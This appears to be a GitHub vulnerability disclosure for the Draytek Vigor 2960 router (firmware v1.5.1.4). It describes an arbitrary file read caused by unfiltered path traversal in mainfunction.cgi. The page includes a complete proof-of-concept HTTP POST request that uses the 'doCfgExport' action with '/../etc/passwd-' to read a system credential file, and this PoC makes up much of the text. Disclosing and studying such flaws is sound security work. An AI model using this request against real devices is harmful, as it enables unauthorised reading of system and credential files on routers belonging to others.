Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Draytek vigor 2960 v1.5.1.4 has arbitrary file read vulnerability

OverView

Product: Draytek Vigor 2960 v1.5.1.4(the newest version) Firmware: v1.5.1.4 https://fw.draytek.com.tw/Vigor2960/Firmware/v1.5.1.4/Vigor2960_v1.5.1.4.zip

Detail

The vulnerability is in the file mainfunction.cgi, function sub_1DF14

It doesn’t filter the var option, so we can use /../to read arbitrary file.

image-20230218203912092

poc

POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: xxxxxxxx
Content-Length: 61
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: xxxxxxxx
Referer: xxxxxxxxxx
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: SESSION_ID_VIGOR=7:26EB81E4EA6DC603661320EBD1C938DC
Connection: close

action=doCfgExport&option=/../etc/passwd-&rtick=1663484341535

image-20230218203937963